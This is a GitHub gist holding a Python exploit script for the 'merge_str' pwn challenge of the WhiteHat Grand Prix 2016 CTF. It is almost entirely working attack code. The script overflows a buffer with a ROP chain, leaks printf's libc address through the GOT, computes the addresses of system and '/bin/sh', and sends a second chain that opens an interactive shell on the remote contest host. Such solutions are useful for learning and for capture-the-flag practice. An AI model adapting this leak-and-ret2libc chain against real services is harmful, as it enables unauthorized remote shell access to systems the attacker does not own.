Skip to content

Instantly share code, notes, and snippets.

@peternguyen93

peternguyen93/merge_string_pwn100_grandprix2016.py

Created December 19, 2016 06:40
Show Gist options
  • Save peternguyen93/a1fe4d40c64646b601b0630e86c85eb0 to your computer and use it in GitHub Desktop.
Save peternguyen93/a1fe4d40c64646b601b0630e86c85eb0 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
merge_string_pwn100_grandprix2016.py
from Pwn import *
p = Pwn(elf='./merge_str',host='bakpwn06.grandprix.whitehatvn.com',port=23506)
def exploit():
p.connect()
p.read_until(':')
p.sendline('A'*50)
p.read_until(':')
p.sendline('B'*50)
# raw_input('>')
p.read_until('(Y/N)')
p.sendline('Y')
p.read_until('Index :')
p.sendint(184)
p.read_until('String:')
payload = 'A'*28
payload+= p.pA(
p.plt['printf'],
0x08048b06,# pop ebp; ret
p.got['printf'],
0x08048C7F # main
)
p.sendline(payload)
out = p.read_until('=MERGE=MESSAGE')
idx = out.find('\xb7')
printf = p.unpack(out[idx-3:idx+1])
system = printf - p.get_libc_offset(printf,'printf')
bin_sh = printf - p.get_libc_offset(printf,'printf','/bin/sh')
print hex(printf)
print hex(system)
print hex(bin_sh)
p.read_until(':')
p.sendline('A'*50)
p.read_until(':')
p.sendline('B'*50)
# raw_input('>')
p.read_until('(Y/N)')
p.sendline('Y')
p.read_until('Index :')
p.sendint(184)
p.read_until('String:')
payload = 'A'*28
payload+= p.pA(
system,
0x08048b06,# pop ebp; ret
bin_sh,
0x08048C7F # main
)
p.sendline(payload)
p.io()
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment